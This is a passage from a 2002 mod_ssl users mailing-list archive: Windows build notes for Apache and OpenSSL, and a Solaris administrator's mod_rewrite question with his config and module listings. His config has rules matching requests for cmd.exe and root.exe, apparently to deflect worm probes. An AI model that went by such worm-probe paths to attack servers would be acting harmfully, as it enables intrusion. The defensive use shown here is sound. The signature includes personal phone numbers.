  If all is well it should compile and you will have some DLLs and 
executables
  in out32dll. If you want to try the tests then do:

  > cd out32dll
  > ..\ms\test




(snip) lots of test results...


test sslv2/sslv3 with both client and server authentication via BIO pair
client authentication
server authentication
depth=2 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test PCA (1024 bit)
depth=1 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test CA (1024 bit)
depth=0 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Server test cert (512 
bit)
depth=2 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test PCA (1024 bit)
depth=1 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test CA (1024 bit)
depth=0 error=10 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Client test 
cert (512 bit)
depth=0 /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Client test cert (512 
bit)
TLSv1, cipher TLSv1/SSLv3 EDH-RSA-DES-CBC3-SHA, 512 bit RSA
passed all tests

2002.07.17 22.11.14.32
[I:\httpd-2.0.39\srclib\openssl\out32dll]


7. Time to build Apache
8. cd ..\..\.. ?:\httpd-2.0.39\nmake /f Makefile.win PORT=80 
INSTDIR="f:\Apache" installr

...an old copy of bison will cause a failure here...

(snip)

    Creating library .\Release\mod_proxy_http.lib and object 
.\Release\mod_proxy_http.exp
         cd ..\..
         cd modules\ssl
         NMAKE -nologo -f mod_ssl.mak         CFG="mod_ssl - Win32 
Release" RECURSE=0  .\Release\mod_ssl.so
         if not exist ".\Release/" mkdir ".\Release"
         tempfile.bat
         tempfile.bat
         tempfile.bat
         tempfile.bat
         rc.exe /l 0x409 /fo".\Release\mod_ssl.res" /d "NDEBUG" .\mod_ssl.rc
         cl.exe @I:\Temp\nma02896.
mod_ssl.c
ssl_engine_config.c
ssl_engine_dh.c
ssl_engine_init.c
ssl_engine_io.c
ssl_engine_kernel.c
ssl_engine_log.c
ssl_engine_mutex.c
ssl_engine_pphrase.c
ssl_engine_rand.c
ssl_engine_vars.c
ssl_expr.c
ssl_expr_eval.c
ssl_expr_parse.c
ssl_expr_scan.c
ssl_scache.c
ssl_scache_dbm.c
ssl_scache_shmcb.c
ssl_scache_shmht.c
ssl_util.c
Generating Code...
Compiling...
ssl_util_ssl.c
ssl_util_table.c
Generating Code...
         link.exe @I:\Temp\nmb02896.
    Creating library .\Release\mod_ssl.lib and object .\Release\mod_ssl.exp
         cd ..\..
         cd support
         NMAKE -nologo -f abs.mak             CFG="abs - Win32 Release" 
RECURSE=0
         if not exist ".\Release/" mkdir ".\Release"
         cl.exe @I:\Temp\nma03668.
ab.c



(snip)



         1 file(s) copied.
         awk -f script.awk "docs/conf/ssl-std.conf" "f:\Apache" > 
"f:\Apache\conf\ssl.default.conf"
         if not exist "f:\Apache\conf\ssl.conf"  copy 
"f:\Apache\conf\ssl.default.conf" "f:\Apache\conf\ssl.conf"
         1 file(s) copied.
         awk -f script.awk "support/dbmmanage.in" 
 >"f:\Apache\bin\dbmmanage.pl"
         del .a .y

2002.07.17 22.20.36.19
[I:\httpd-2.0.39]


bison, flex and awk are required ... they are in my cygwin, that I had 
to update
or it would fail to build mod_ssl.so -- syntax error in dynamicall 
generated c source - generated
by bison.


I now have an installed version ...

Still to be done.

httpd.conf must be tuned and certs made

If you get this far I will tell you how I continued, but it gets mucky 
from here.  I am not very certain about creating certs.


Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 05:27:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA29510; Thu, 18 Jul 2002 05:26:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts12-srv.bellnexxia.net id FAA29505; Thu, 18 Jul 2002 05:25:52 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.173])
          by tomts12-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020718032602.RXKB1307.tomts12-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 17 Jul 2002 23:26:02 -0400
Message-ID: <3D363546.7070008@sympatico.ca>
Date: Wed, 17 Jul 2002 23:25:58 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
References: <200207170537.AA2007040044@lopette.org> <3D356F9D.2030404@sympatico.ca> <3D362AAE.1030400@sympatico.ca>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry about replying to my own message.

In the event that it may be useful I have placed the entire build on 
line -- that I made while creating my earlier instructions.

I do not feel in anyway an authority, but I have managed to get the code 
to build and start (load).  Though I did not finish the configuration in 
this case, nor did I make any certs.

http://tor.ath.cx/~hunter/apache/apache.zip

It is large ... pull it down if you wish to learn from it.  Use it if 
you like ... your choice.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 06:32:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA02128; Thu, 18 Jul 2002 06:31:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from troy.barwonwater.vic.gov.au id GAA02016; Thu, 18 Jul 2002 06:29:58 +0200 (MET DST)
Received: from barwonwater.vic.gov.au (matrix.is.barwonwater.vic.gov.au [138.19.9.83])
	by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id OAA05576
	for ; Thu, 18 Jul 2002 14:29:47 +1000 (EST)
Message-ID: <3D36443B.6010006@barwonwater.vic.gov.au>
Date: Thu, 18 Jul 2002 14:29:47 +1000
From: Christopher Welsh 
Organization: Barwon Water
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Mod_Rewrite - errors what am I doing wrong?
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Welsh 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

G'Day,

Anyone help with this?

I added rewrite stuff  to the virtual host but am getting an error below



Here is the error I get when starting up.

It's Solaris 2.8 by the way

Starting Apache Web Server

Syntax error on line 1125 of /opt/apache/conf/httpd.conf:
Invalid command 'RewriteEngine', perhaps mis-spelled or defined by a 
module not
included in the server configuration



##
## SSL Virtual Host Context
##



#  General setup for the virtual host
DocumentRoot "/opt/apache/share/htdocs/www"
ServerName www.barwonwater.vic.gov.au
ServerAdmin webmaster@barwonwater.vic.gov.au
ErrorDocument 404 /missing.cfm
ErrorLog /var/opt/apache/error_log
TransferLog /var/opt/apache/access_log

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on


RewriteEngine on
RewriteRule cmd.exe$ http://update.viruschecker.com
RewriteRule root.exe$ http://update.viruschecker.com

Here's the ompile stuff

cd apache_1.3.26
  cd ../../mod_ssl
  gunzip mod_ssl-2.8.10-1.3.26.tar.gz
  tar -vxf mod_ssl-2.8.10-1.3.26.tar
  cd mod_ssl-2.8.10-1.3.26
  make clean
  less INSTALL # Read the INSTALL file
  cd ../../openssl/openssl-0.9.6b
  make clean
  # Used gcc. Gcc supports position independant code flag.
  ./Configure no-threads solaris-sparcv9-gcc -fPIC
  make
  make test
  cd ../../mm/mm-1.1.3
  ./configure  --disable-shared
  make
  cd ../../mod_ssl/mod_ssl-2.8.10-1.3.26
  ./configure --with-apache=../../apache/apache_1.3.26
  cd ../../apache/apache_1.3.26
  env LIBS=/usr/lib/libC.so.5 CFLAGS=-fPIC 
SSL_BASE=../../openssl/openssl-0.9.6b ./configure --enable-module=ssl 
--enable-module=so --enable-shared=ssl --enable-module=rewrite 
--prefix=/opt/apache --runtimedir=/var/opt/apache 
--logfiledir=/var/opt/apache
make




Anyone got a sample config showing where to put it. Oh yea here is the 
./httpd -l

Compiled-in modules:
  http_core.c
  mod_env.c
  mod_log_config.c
  mod_mime.c
  mod_negotiation.c
  mod_status.c
  mod_include.c
  mod_autoindex.c
  mod_dir.c
  mod_cgi.c
  mod_asis.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_rewrite.c
  mod_access.c
  mod_auth.c
  mod_so.c
  mod_setenvif.c
suexec: disabled; invalid wrapper /opt/apache/bin/suexec


httpd -V

Server version: Apache/1.3.26 (Unix)
Server built:   Jun 28 2002 23:12:07
Server's Module Magic Number: 19990320:13
Server compiled with....
 -D EAPI
 -D HAVE_MMAP
 -D USE_MMAP_SCOREBOARD
 -D USE_MMAP_FILES
 -D HAVE_FCNTL_SERIALIZED_ACCEPT
 -D HAVE_SYSVSEM_SERIALIZED_ACCEPT
 -D HAVE_PTHREAD_SERIALIZED_ACCEPT
 -D HTTPD_ROOT="/opt/apache"
 -D SUEXEC_BIN="/opt/apache/bin/suexec"
 -D DEFAULT_PIDLOG="/var/opt/apache/httpd.pid"
 -D DEFAULT_SCOREBOARD="/var/opt/apache/httpd.scoreboard"
 -D DEFAULT_LOCKFILE="/var/opt/apache/httpd.lock"
 -D DEFAULT_ERRORLOG="/var/opt/apache/error_log"
 -D TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"
 -D ACCESS_CONFIG_FILE="conf/access.conf"
 -D RESOURCE_CONFIG_FILE="conf/srm.conf"


peking# ./httpd -L
,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf only inside ,  or 
,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf only inside ,  or 
,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf only outside ,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
 (http_core.c)
        Marks end of 
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
 (http_core.c)
        Marks end of 
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
 (http_core.c)
        Marks end of 
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
 (http_core.c)
        Marks end of 
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf only inside ,  or 
,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf only inside ,  or 
 (http_core.c)
        Marks end of 
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
AuthType (http_core.c)
        An HTTP authorization type (e.g., "Basic")
        Allowed in *.conf only inside ,  or  
and in .htaccess
        when AllowOverride includes AuthConfig
AuthName (http_core.c)
        The authentication realm (e.g. "Members Only")
        Allowed in *.conf only inside ,  or  
and in .htaccess
        when AllowOverride includes AuthConfig
Require (http_core.c)
        Selects which authenticated users or groups may access a 
protected space        Allowed in *.conf only inside , 
 or  and in .htaccess
        when AllowOverride includes AuthConfig
Satisfy (http_core.c)
        access policy if both allow and require used ('all' or 'any')
        Allowed in *.conf only inside ,  or  
and in .htaccess
        when AllowOverride includes AuthConfig
AddDefaultCharset (http_core.c)
        The name of the default charset to add to any Content-Type 
without one or 'Off' to disable
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AccessFileName (http_core.c)
        Name(s) of per-directory config files (default: .htaccess)
        Allowed in *.conf only outside ,  or 
DocumentRoot (http_core.c)
        Root directory of the document tree
        Allowed in *.conf only outside ,  or 
ErrorDocument (http_core.c)
        Change responses for HTTP errors
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AllowOverride (http_core.c)
        Controls what groups of directives can be configured by 
per-directory config files
        Allowed in *.conf only inside ,  or 
Options (http_core.c)
        Set a number of attributes for a given directory
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Options
DefaultType (http_core.c)
        the default MIME type for untypable files
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
ServerType (http_core.c)
        'inetd' or 'standalone'
        Allowed in *.conf only outside ,  or 
Port (http_core.c)
        A TCP port number
        Allowed in *.conf only outside ,  or 
HostnameLookups (http_core.c)
        "on" to enable, "off" to disable reverse DNS lookups, or 
"double" to enable double-reverse DNS lookups
        Allowed in *.conf anywhere
User (http_core.c)
        Effective user id for this server
        Allowed in *.conf only outside ,  or 
Group (http_core.c)
        Effective group id for this server
        Allowed in *.conf only outside ,  or 
ServerAdmin (http_core.c)
        The email address of the server administrator
        Allowed in *.conf only outside ,  or 
ServerName (http_core.c)
        The hostname of the server
        Allowed in *.conf only outside ,  or 
ServerSignature (http_core.c)
        En-/disable server signature (on|off|email)
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
ServerRoot (http_core.c)
        Common directory of server-related files (logs, confs, etc.)
        Allowed in *.conf only outside ,  or 
ErrorLog (http_core.c)
        The filename of the error log
        Allowed in *.conf only outside ,  or 
PidFile (http_core.c)
        A file for logging the server process ID
        Allowed in *.conf only outside ,  or 
ScoreBoardFile (http_core.c)
        A file for Apache to maintain runtime process management information
        Allowed in *.conf only outside ,  or 
LockFile (http_core.c)
        The lockfile used when Apache needs to lock the accept() call
        Allowed in *.conf only outside ,  or 
AccessConfig (http_core.c)
        The filename of the access config file
        Allowed in *.conf only outside ,  or 
ResourceConfig (http_core.c)
        The filename of the resource config file
        Allowed in *.conf only outside ,  or 
ServerAlias (http_core.c)
        A name or names alternately used to access the server
        Allowed in *.conf only outside ,  or 
ServerPath (http_core.c)
        The pathname the server can be reached at
        Allowed in *.conf only outside ,  or 
Timeout (http_core.c)
        Timeout duration (sec)
        Allowed in *.conf only outside ,  or 
KeepAliveTimeout (http_core.c)
        Keep-Alive timeout duration (sec)
        Allowed in *.conf only outside ,  or 
MaxKeepAliveRequests (http_core.c)
        Maximum number of Keep-Alive requests per connection, or 0 for 
infinite         Allowed in *.conf only outside ,  or 

KeepAlive (http_core.c)
        Whether persistent connections should be On or Off
        Allowed in *.conf only outside ,  or 
IdentityCheck (http_core.c)
        Enable identd (RFC 1413) user lookups - SLOW
        Allowed in *.conf anywhere
ContentDigest (http_core.c)
        whether or not to send a Content-MD5 header with each request
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Options
UseCanonicalName (http_core.c)
        How to work out the ServerName : Port when constructing URLs
        Allowed in *.conf anywhere
StartServers (http_core.c)
        Number of child processes launched at server startup
        Allowed in *.conf only outside ,  or 
MinSpareServers (http_core.c)
        Minimum number of idle children, to handle request spikes
        Allowed in *.conf only outside ,  or 
MaxSpareServers (http_core.c)
        Maximum number of idle children
        Allowed in *.conf only outside ,  or 
MaxServers (http_core.c)
        Deprecated equivalent to MaxSpareServers
        Allowed in *.conf only outside ,  or 
ServersSafetyLimit (http_core.c)
        Deprecated equivalent to MaxClients
        Allowed in *.conf only outside ,  or 
MaxClients (http_core.c)
        Maximum number of children alive at the same time
        Allowed in *.conf only outside ,  or 
MaxRequestsPerChild (http_core.c)
        Maximum number of requests a particular child serves before dying.
        Allowed in *.conf only outside ,  or 
RLimitCPU (http_core.c)
        Soft/hard limits for max CPU usage in seconds
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
RLimitMEM (http_core.c)
        Soft/hard limits for max memory usage per process
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
RLimitNPROC (http_core.c)
        soft/hard limits for max number of processes per uid
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
BindAddress (http_core.c)
        '*', a numeric IP address, or the name of a host with a unique 
IP address
        Allowed in *.conf only outside ,  or 
Listen (http_core.c)
        A port number or a numeric IP address and a port number
        Allowed in *.conf only outside ,  or 
SendBufferSize (http_core.c)
        Send buffer size in bytes
        Allowed in *.conf only outside ,  or 
AddModule (http_core.c)
        The name of a module
        Allowed in *.conf only outside ,  or 
ClearModuleList (http_core.c)
        Allowed in *.conf only outside ,  or 
ThreadsPerChild (http_core.c)
        Number of threads a child creates
        Allowed in *.conf only outside ,  or 
ExcessRequestsPerChild (http_core.c)
        Maximum number of requests a particular child serves after it is 
ready to die.
        Allowed in *.conf only outside ,  or 
ListenBacklog (http_core.c)
        Maximum length of the queue of pending connections, as used by 
listen(2)        Allowed in *.conf only outside ,  or 

AcceptFilter (http_core.c)
        Switch AcceptFiltering on/off (default is on).This feature is 
currently not compiled in; so this directive is ignored.
        Allowed in *.conf only outside ,  or 
CoreDumpDirectory (http_core.c)
        The location of the directory Apache changes to before dumping core
        Allowed in *.conf only outside ,  or 
Include (http_core.c)
        Name of the config file to be included
        Allowed in *.conf anywhere
LogLevel (http_core.c)
        Level of verbosity in error logging
        Allowed in *.conf only outside ,  or 
NameVirtualHost (http_core.c)
        A numeric IP address:port, or the name of a host
        Allowed in *.conf only outside ,  or 
CGICommandArgs (http_core.c)
        Allow or Disallow CGI requests to pass args on the command line
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Options
ServerTokens (http_core.c)
        Tokens displayed in the Server: header - Min[imal], OS, 
Prod[uctOnly], Full
        Allowed in *.conf only outside ,  or 
LimitRequestLine (http_core.c)
        Limit on maximum size of an HTTP request line
        Allowed in *.conf only outside ,  or 
LimitRequestFieldsize (http_core.c)
        Limit on maximum size of an HTTP request header field
        Allowed in *.conf only outside ,  or 
LimitRequestFields (http_core.c)
        Limit (0 = unlimited) on max number of header fields in a 
request message
        Allowed in *.conf only outside ,  or 
LimitRequestBody (http_core.c)
        Limit (in bytes) on maximum size of request message body
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride isn't None
AcceptMutex (http_core.c)
        Serialized Accept Mutex; the methods 'pthread' 'sysvsem' 'fcntl' 
are compiled in
        Allowed in *.conf only outside ,  or 
FileETag (http_core.c)
        Specify components used to construct a file's ETag
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
PassEnv (mod_env.c)
        a list of environment variables to pass to CGI.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
SetEnv (mod_env.c)
        an environment variable name and a value to pass to CGI.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
UnsetEnv (mod_env.c)
        a list of variables to remove from the CGI environment.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
CustomLog (mod_log_config.c)
        a file name, a custom log format string or format name, and an 
optional "env=" clause (see docs)
        Allowed in *.conf only outside ,  or 
TransferLog (mod_log_config.c)
        the filename of the access log
        Allowed in *.conf only outside ,  or 
LogFormat (mod_log_config.c)
        a log format string (see docs) and an optional format name
        Allowed in *.conf only outside ,  or 
CookieLog (mod_log_config.c)
        the filename of the cookie log
        Allowed in *.conf only outside ,  or 
AddType (mod_mime.c)
        a mime type followed by one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AddEncoding (mod_mime.c)
        an encoding (e.g., gzip), followed by one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AddCharset (mod_mime.c)
        a charset (e.g., iso-2022-jp), followed by one or more file 
extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AddLanguage (mod_mime.c)
        a language (e.g., fr), followed by one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AddHandler (mod_mime.c)
        a handler name followed by one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
ForceType (mod_mime.c)
        a media type
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RemoveHandler (mod_mime.c)
        one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RemoveEncoding (mod_mime.c)
        one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RemoveType (mod_mime.c)
        one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
SetHandler (mod_mime.c)
        a handler name
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
TypesConfig (mod_mime.c)
        the MIME types config file
        Allowed in *.conf only outside ,  or 
DefaultLanguage (mod_mime.c)
        language to use for documents with no other language file extension
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
CacheNegotiatedDocs (mod_negotiation.c)
        no arguments (either present or absent)
        Allowed in *.conf only outside ,  or 
LanguagePriority (mod_negotiation.c)
        space-delimited list of MIME language abbreviations
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
ExtendedStatus (mod_status.c)
        "On" to enable extended status information, "Off" to disable
        Allowed in *.conf only outside ,  or 
XBitHack (mod_include.c)
        Off, On, or Full
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Options
AddIcon (mod_autoindex.c)
        an icon URL followed by one or more filenames
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
AddIconByType (mod_autoindex.c)
        an icon URL followed by one or more MIME types
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
AddIconByEncoding (mod_autoindex.c)
        an icon URL followed by one or more content encodings
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
AddAlt (mod_autoindex.c)
        alternate descriptive text followed by one or more filenames
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
AddAltByType (mod_autoindex.c)
        alternate descriptive text followed by one or more MIME types
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
AddAltByEncoding (mod_autoindex.c)
        alternate descriptive text followed by one or more content encodings
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
IndexOptions (mod_autoindex.c)
        one or more index options
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
IndexOrderDefault (mod_autoindex.c)
        {Ascending,Descending} {Name,Size,Description,Date}
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
IndexIgnore (mod_autoindex.c)
        one or more file extensions
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
AddDescription (mod_autoindex.c)
        Descriptive text followed by one or more filenames
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
HeaderName (mod_autoindex.c)
        a filename
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
ReadmeName (mod_autoindex.c)
        a filename
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
FancyIndexing (mod_autoindex.c)
        Limited to 'on' or 'off' (superseded by IndexOptions FancyIndexing)
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
DefaultIcon (mod_autoindex.c)
        an icon URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
DirectoryIndex (mod_dir.c)
        a list of file names
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
ScriptLog (mod_cgi.c)
        the name of a log for script debugging info
        Allowed in *.conf only outside ,  or 
ScriptLogLength (mod_cgi.c)
        the maximum length (in bytes) of the script debug log
        Allowed in *.conf only outside ,  or 
ScriptLogBuffer (mod_cgi.c)
        the maximum size (in bytes) to record of a POST request
        Allowed in *.conf only outside ,  or 
ImapMenu (mod_imap.c)
        the type of menu generated: none, formatted, semiformatted, 
unformatted         Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
ImapDefault (mod_imap.c)
        the action taken if no match: error, nocontent, referer, menu, URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
ImapBase (mod_imap.c)
        the base for all URL's: map, referer, URL (or start of)
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes Indexes
Action (mod_actions.c)
        a media type followed by a script name
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
Script (mod_actions.c)
        a method followed by a script name
        Allowed in *.conf anywhere
UserDir (mod_userdir.c)
        the public subdirectory in users' home directories, or 
'disabled', or 'disabled username username...', or 'enabled username 
username...'
        Allowed in *.conf only outside ,  or 
Alias (mod_alias.c)
        a fakename and a realname
        Allowed in *.conf only outside ,  or 
ScriptAlias (mod_alias.c)
        a fakename and a realname
        Allowed in *.conf only outside ,  or 
Redirect (mod_alias.c)
        an optional status, then document to be redirected and 
destination URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
AliasMatch (mod_alias.c)
        a regular expression and a filename
        Allowed in *.conf only outside ,  or 
ScriptAliasMatch (mod_alias.c)
        a regular expression and a filename
        Allowed in *.conf only outside ,  or 
RedirectMatch (mod_alias.c)
        an optional status, then a regular expression and destination URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RedirectTemp (mod_alias.c)
        a document to be redirected, then the destination URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RedirectPermanent (mod_alias.c)
        a document to be redirected, then the destination URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RewriteEngine (mod_rewrite.c)
        On or Off to enable or disable (default) the whole rewriting engine
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RewriteOptions (mod_rewrite.c)
        List of option strings to set
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RewriteBase (mod_rewrite.c)
        the base URL of the per-directory context
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RewriteCond (mod_rewrite.c)
        an input string and a to be applied regexp-pattern
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RewriteRule (mod_rewrite.c)
        an URL-applied regexp-pattern and a substitution URL
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
RewriteMap (mod_rewrite.c)
        a mapname and a filename
        Allowed in *.conf only outside ,  or 
RewriteLock (mod_rewrite.c)
        the filename of a lockfile used for inter-process synchronization
        Allowed in *.conf only outside ,  or 
RewriteLog (mod_rewrite.c)
        the filename of the rewriting logfile
        Allowed in *.conf only outside ,  or 
RewriteLogLevel (mod_rewrite.c)
        the level of the rewriting logfile verbosity (0=none, 1=std, .., 
9=max)         Allowed in *.conf only outside ,  or 

order (mod_access.c)
        'allow,deny', 'deny,allow', or 'mutual-failure'
        Allowed in *.conf only inside ,  or  
and in .htaccess
        when AllowOverride includes Limit
allow (mod_access.c)
        'from' followed by hostnames or IP-address wildcards
        Allowed in *.conf only inside ,  or  
and in .htaccess
        when AllowOverride includes Limit
deny (mod_access.c)
        'from' followed by hostnames or IP-address wildcards
        Allowed in *.conf only inside ,  or  
and in .htaccess
        when AllowOverride includes Limit
AuthUserFile (mod_auth.c)
        text file containing user IDs and passwords
        Allowed in *.conf only inside ,  or  
and in
.htaccess
        when AllowOverride includes AuthConfig
AuthGroupFile (mod_auth.c)
        text file containing group names and member user IDs
        Allowed in *.conf only inside ,  or  
and in
.htaccess
        when AllowOverride includes AuthConfig
AuthAuthoritative (mod_auth.c)
        Set to 'off' to allow access control to be passed along to lower 
modules if the UserID is not known to this module
        Allowed in *.conf only inside ,  or  
and in
.htaccess
        when AllowOverride includes AuthConfig
LoadModule (mod_so.c)
        a module name and the name of a shared object file to load it from
        Allowed in *.conf only outside ,  or 
LoadFile (mod_so.c)
        shared object file or library to load into the server at runtime
        Allowed in *.conf only outside ,  or 
SetEnvIf (mod_setenvif.c)
        A header-name, regex and a list of variables.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
SetEnvIfNoCase (mod_setenvif.c)
        a header-name, regex and a list of variables.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
BrowserMatch (mod_setenvif.c)
        A browser regex and a list of variables.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
BrowserMatchNoCase (mod_setenvif.c)
        A browser regex and a list of variables.
        Allowed in *.conf anywhere and in .htaccess
        when AllowOverride includes FileInfo
.
.

-- 
Christopher Welsh
Barwon Regional Water Authority,
Geelong Victoria, 3216
Voice: 03 52 262385, Mobile: 0409 562968



*********************************************************************************************


The information in this e-mail message and any files transmitted with it
are confidential
and/or privileged and are intended only for the use of the individual or
entity to whom
they are addressed.  If you received this message in error please notify us
immediately
by telephone or return e-mail and delete all copies from your computer
system, as your
retention, distribution or copying of this message and files is strictly
prohibited.

It is the recipient's responsibility to check this message and files for
viruses.

***********************************************************************************************


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 10:35:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA13068; Thu, 18 Jul 2002 10:34:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA13034; Thu, 18 Jul 2002 10:33:27 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
